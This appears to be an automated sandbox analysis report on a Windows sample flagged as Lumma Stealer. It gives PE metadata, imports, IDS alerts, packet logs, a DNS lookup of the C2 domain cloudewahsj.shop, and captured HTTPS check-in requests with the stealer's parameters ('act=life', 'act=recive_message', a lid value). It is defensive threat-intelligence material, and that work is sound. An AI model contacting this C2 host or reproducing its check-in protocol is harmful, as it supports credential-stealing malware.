IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x410e0	0x41200	f40acb4335ceb50eff76bd7d934c9f39	False	0.8880533229366603	data	7.837501375498493	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x43000	0xaba4	0x6000	66d79d00ed28eceb3bcc807f648ebd49	False	0.0799560546875	Matlab v4 mat-file (little endian) \342C@, rows 0, columns 0	0.9408778473769681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4e000	0xc0a8	0x7200	4fe29879bf6c07e71e441c8b594d2653	False	0.4739583333333333	data	4.782018542078936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x54280	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x545b0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_ICON	0x4e390	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.43656716417910446
RT_ICON	0x4f238	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5532490974729242
RT_ICON	0x4fae0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.581221198156682
RT_ICON	0x501a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.611271676300578
RT_ICON	0x50710	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.44450207468879666
RT_ICON	0x52cb8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4960131332082552
RT_ICON	0x53d60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.524822695035461
RT_STRING	0x54928	0x3ce	AmigaOS bitmap font "i", fc_YSize 30720, 19456 elements, 2nd "f", 3rd "v"	Romanian	Romania	0.4650924024640657
RT_STRING	0x54cf8	0x3b0	data	Romanian	Romania	0.461864406779661
RT_ACCELERATOR	0x54230	0x50	data	Romanian	Romania	0.8125
RT_GROUP_CURSOR	0x546e0	0x22	data			1.0294117647058822
RT_GROUP_ICON	0x541c8	0x68	data	Romanian	Romania	0.6826923076923077
RT_VERSION	0x54708	0x21c	data			0.5166666666666667

Imports

DLL	Import
KERNEL32.dll	SetLocaleInfoA, WriteConsoleInputW, InterlockedIncrement, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, FreeEnvironmentStringsA, GetWindowsDirectoryA, EnumTimeFormatsW, SwitchToFiber, ReadConsoleInputA, GetVersionExW, GetAtomNameW, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, OpenEventA, GetCommMask, FindNextFileA, EnumDateFormatsA, GetModuleHandleA, TerminateJobObject, GetCurrentProcessId, EnumCalendarInfoExA, FindNextVolumeA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, HeapFree, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, RaiseException, SetStdHandle, GetLocaleInfoA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CloseHandle
USER32.dll	OemToCharA, DdeQueryStringA, GetWindowTextLengthA
SHELL32.dll	DragQueryPoint

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-04T15:33:16.721080+0100	2058606	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)	1	192.168.2.7	49526	1.1.1.1	53	UDP
2025-01-04T15:33:17.245214+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:17.245214+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:18.417446+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:18.417446+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49710	104.21.64.1	443	TCP
2025-01-04T15:33:18.940442+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.7	49721	104.21.64.1	443	TCP
2025-01-04T15:33:18.940442+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49721	104.21.64.1	443	TCP
2025-01-04T15:33:19.427444+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49721	104.21.64.1	443	TCP
2025-01-04T15:33:19.427444+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49721	104.21.64.1	443	TCP
2025-01-04T15:33:20.402724+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.7	49732	104.21.64.1	443	TCP
2025-01-04T15:33:20.402724+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49732	104.21.64.1	443	TCP
2025-01-04T15:33:20.989285+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49732	104.21.64.1	443	TCP
2025-01-04T15:33:21.556667+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.7	49738	104.21.64.1	443	TCP
2025-01-04T15:33:21.556667+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49738	104.21.64.1	443	TCP
2025-01-04T15:33:23.166290+0100	2058607	ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)	1	192.168.2.7	49752	104.21.64.1	443	TCP
2025-01-04T15:33:23.166290+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49752	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 15:33:16.741897106 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:16.741923094 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:16.742028952 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:16.768830061 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:16.768843889 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:17.245126963 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:17.245213985 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:17.250274897 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:17.250293970 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:17.250633955 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:17.295469046 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:17.707211971 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:17.707238913 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:17.707331896 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.417471886 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.417587996 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.417655945 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.428214073 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.428214073 CET	49710	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.428231955 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.428241968 CET	443	49710	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.440471888 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.440517902 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.440614939 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.440882921 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.440901995 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.940361023 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.940442085 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.941904068 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.941911936 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.942286968 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:18.943579912 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.943732977 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:18.943767071 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427473068 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427541018 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427566051 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427593946 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427614927 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.427623034 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427634001 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.427651882 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.427673101 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.427678108 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.428108931 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.428137064 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.428180933 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.428189993 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.428246021 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.432046890 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.482897043 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.482920885 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.521115065 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.521208048 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.521218061 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.521281958 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.521334887 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.521339893 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.521387100 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.521431923 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.522066116 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.522082090 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.522119999 CET	49721	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.522125959 CET	443	49721	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.760880947 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.760911942 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:19.761028051 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.761369944 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:19.761383057 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.402558088 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.402724028 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:20.428946972 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:20.428966045 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.429256916 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.430624008 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:20.430712938 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:20.430733919 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.989300966 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.989403009 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:20.989453077 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:20.989690065 CET	49732	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:20.989702940 CET	443	49732	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.091792107 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.091821909 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.091933966 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.092200994 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.092215061 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.556524992 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.556667089 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.558264017 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.558274984 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.558514118 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.559899092 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.560022116 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.560059071 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:21.560129881 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:21.560148001 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:22.382601023 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:22.382702112 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:22.382765055 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:22.383071899 CET	49738	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:22.383096933 CET	443	49738	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:22.682686090 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:22.682709932 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:22.682840109 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:22.683068991 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:22.683080912 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.166186094 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.166290045 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.171540976 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.171546936 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.171803951 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.173158884 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.173369884 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.173398018 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.173456907 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.173465967 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.677139044 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.677254915 CET	443	49752	104.21.64.1	192.168.2.7
Jan 4, 2025 15:33:23.677325010 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.677587986 CET	49752	443	192.168.2.7	104.21.64.1
Jan 4, 2025 15:33:23.677602053 CET	443	49752	104.21.64.1	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 15:33:16.721080065 CET	49526	53	192.168.2.7	1.1.1.1
Jan 4, 2025 15:33:16.731959105 CET	53	49526	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 4, 2025 15:33:16.721080065 CET	192.168.2.7	1.1.1.1	0x9355	Standard query (0)	cloudewahsj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:16.731959105 CET	1.1.1.1	192.168.2.7	0x9355	No error (0)	cloudewahsj.shop	104.21.80.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cloudewahsj.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49710	104.21.64.1	443	7336	C:\Users\user\Desktop\SOElePqvtf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:17 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: cloudewahsj.shop
2025-01-04 14:33:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-04 14:33:18 UTC	1120	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ana0nr1lvqil3nnc0bvhhi8394; expires=Wed, 30 Apr 2025 08:19:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jl9VQVCAnwqrvP81tpoxSGCBJifGzeoI4DltwXyocUOObyaF8hSAuOJHVLnwyiQ7rw1tDRUwvUu6alCMJWj58MarOq%2FeTnGU2J%2BQ6E7pxJGURA6Ok8gdZtab20ZNTi7HUM9q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf15dfb63de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1647&rtt_var=625&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=907&delivery_rate=1740166&cwnd=242&unsent_bytes=0&cid=93c5dbfc6f3242e5&ts=1184&x=0"
2025-01-04 14:33:18 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-04 14:33:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49721	104.21.64.1	443	7336	C:\Users\user\Desktop\SOElePqvtf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:18 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: cloudewahsj.shop
2025-01-04 14:33:18 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-04 14:33:19 UTC	1127	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7rtibfo7f115i7gdopakevd4p5; expires=Wed, 30 Apr 2025 08:19:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dyvVVXOsrJlLe7pLlL9eYF%2FxJHv7eJbjxVteGhE6FzvaRAj%2BJZ1aZDSt0pA0h8SZqFja%2BNcs%2F3C8I1mAzzD1c9EmHWfI8fDIl0IEiQ%2FhE2v8uhDs%2F8rM81wYPWabKPu8JDSr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf165f8ea42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1610&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=974&delivery_rate=1705607&cwnd=240&unsent_bytes=0&cid=f6dbdc81a8085ffa&ts=509&x=0"
2025-01-04 14:33:19 UTC	242	IN	Data Raw: 34 36 64 0d 0a 73 4e 4c 45 7a 44 44 70 54 4d 77 71 38 42 62 31 56 4f 78 5a 72 6b 33 71 58 49 41 4c 42 2b 62 66 4b 65 50 52 66 39 46 41 49 2b 48 4c 38 4c 4c 75 43 74 31 67 37 6c 6d 56 4e 4d 38 67 6e 69 7a 4c 59 63 67 39 35 43 6b 39 67 4c 35 46 6b 4c 52 54 38 7a 5a 4f 77 34 71 30 70 61 42 44 6a 47 44 75 54 34 67 30 7a 77 2b 58 65 38 73 6a 79 47 61 69 62 6d 32 45 76 6b 57 42 73 42 53 2b 4d 45 2b 43 32 4c 36 6a 70 46 57 4b 4b 4b 31 47 6e 58 4f 51 4d 59 30 7a 77 43 53 48 4e 4f 30 70 4b 38 53 36 55 38 48 72 58 5a 77 6c 56 34 44 39 73 37 65 6e 45 70 52 67 74 77 69 56 65 4e 64 75 7a 6a 6a 4c 4c 34 59 36 35 47 42 76 6a 72 64 4e 67 4c 55 56 6f 53 6c 46 69 64 69 77 6f 4b 56 66 67 7a 79 67 54 4a 70 34 6c 6a 75 4e 65 34 4a 76 6a Data Ascii: 46dsNLEzDDpTMwq8Bb1VOxZrk3qXIALB+bfKePRf9FAI+HL8LLuCt1g7lmVNM8gnizLYcg95Ck9gL5FkLRT8zZOw4q0paBDjGDuT4g0zw+Xe8sjyGaibm2EvkWBsBS+ME+C2L6jpFWKKK1GnXOQMY0zwCSHNO0pK8S6U8HrXZwlV4D9s7enEpRgtwiVeNduzjjLL4Y65GBvjrdNgLUVoSlFidiwoKVfgzygTJp4ljuNe4Jvj
2025-01-04 14:33:19 UTC	898	IN	Data Raw: 79 61 69 4d 53 58 58 6a 30 69 51 6f 67 69 2b 4d 6b 66 44 7a 66 36 2f 37 6c 57 48 62 76 59 49 6d 6e 69 5a 4d 34 30 30 79 79 36 49 4c 4f 31 70 5a 6f 79 31 54 34 75 38 45 72 77 73 53 34 54 61 75 61 47 68 56 59 4d 6f 6f 55 76 53 4f 74 63 78 6c 6e 75 55 62 36 67 75 34 57 70 78 69 61 77 4c 6e 76 30 45 38 79 56 4e 77 34 72 77 6f 4b 42 54 68 69 36 38 51 4a 6c 2f 6b 69 53 46 4d 73 45 69 69 44 50 6f 5a 6d 61 45 75 6b 47 4c 76 42 65 33 4c 30 79 46 30 72 44 6d 34 42 4b 4d 4e 75 34 51 30 6c 65 53 4a 6f 6b 33 32 6d 32 79 66 76 30 6e 66 4d 53 36 52 38 48 72 58 62 73 6e 51 6f 44 5a 76 36 57 6d 57 5a 6b 75 76 45 36 66 63 59 55 77 69 7a 58 47 4c 4a 6f 30 37 47 39 6d 6a 62 5a 43 68 4c 51 5a 38 32 77 42 68 4d 72 77 2f 75 35 7a 68 69 57 69 51 6f 56 30 31 79 6e 41 49 6f 77 6f Data Ascii: yaiMSXXj0iQogi+MkfDzf6/7lWHbvYImniZM400yy6ILO1pZoy1T4u8ErwsS4TauaGhVYMooUvSOtcxlnuUb6gu4WpxiawLnv0E8yVNw4rwoKBThi68QJl/kiSFMsEiiDPoZmaEukGLvBe3L0yF0rDm4BKMNu4Q0leSJok32m2yfv0nfMS6R8HrXbsnQoDZv6WmWZkuvE6fcYUwizXGLJo07G9mjbZChLQZ82wBhMrw/u5zhiWiQoV01ynAIowo
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 34 38 32 33 0d 0a 6a 6e 30 4b 58 72 4b 70 41 75 47 76 31 33 72 59 6b 36 4d 33 62 69 6d 72 31 61 47 4b 71 39 46 6e 6e 32 55 4f 6f 49 7a 77 53 4f 4d 4d 65 70 68 5a 6f 79 76 52 59 2b 31 47 37 4d 6e 41 63 32 53 74 37 37 75 43 73 73 4b 6f 46 2b 47 66 39 55 44 6a 54 58 43 4b 4a 35 2b 2f 53 64 38 78 4c 70 48 77 65 74 64 76 53 39 4b 6a 39 57 35 70 36 31 53 67 53 43 68 51 70 70 38 6c 7a 75 50 4d 4d 51 70 68 54 58 74 5a 6d 4b 4d 76 6b 65 45 76 68 37 7a 62 41 47 45 79 76 44 2b 37 6e 65 46 4c 62 39 5a 30 45 47 55 4f 49 41 38 32 6d 2b 58 63 50 73 70 59 6f 6a 39 45 38 47 35 47 72 51 6d 54 49 6e 52 74 4b 4b 6a 58 59 49 6e 70 31 71 59 65 4a 6b 6b 67 7a 48 4a 49 59 51 37 37 57 6c 6b 68 62 4e 42 69 76 4e 54 38 79 56 5a 77 34 72 77 69 61 4e 43 6d 53 53 6c 57 64 42 42 6c 44 Data Ascii: 